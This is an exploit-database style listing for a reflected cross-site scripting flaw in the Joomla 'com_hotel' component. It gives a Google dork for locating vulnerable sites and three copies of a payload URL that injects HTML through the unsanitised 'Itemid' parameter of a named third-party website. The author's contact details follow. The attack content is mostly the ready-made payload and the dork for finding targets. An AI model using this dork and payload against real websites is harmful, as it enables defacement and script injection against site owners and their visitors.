Joomla Component com_hotel Xss

2020.05.06

Milad Karimi (IR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:index.php?option=com_hotel

# Exploit Title: Joomla Component com_hotel
# Date: 2020-05-05
# Author: Milad Karimi
# Contact: miladgrayhat@gmail.com
# Google Dork: inurl:index.php?option=com_hotel
# Version: 1.0
# Tested on: windows 10 , firefox
# CVE : N/A

# Example: http://www.site.com/index.php?option=com_hotel&Itemid=[XSS]

 http://www.aldeiajerome.cv/index.php?option=com_hotel&Itemid=112"><h1>XSS3D By Milad Karimi</h1>&action=edit&lang=en
 http://www.aldeiajerome.cv/index.php?option=com_hotel&Itemid=112"><h1>XSS3D By Milad Karimi</h1>&action=edit&lang=en
 http://www.aldeiajerome.cv/index.php?option=com_hotel&Itemid=112"><h1>XSS3D By Milad Karimi</h1>&action=edit&lang=en

# "Itemid” parameter not sanitized you could inject a XSS vector on the URL and get reflected on the screen. 


************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : miladkarimi311@yahoo.com Email: miladgrayhat@gmail.com
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************ 

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Component com_hotel Xss

Dork: inurl:index.php?option=com_hotel

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.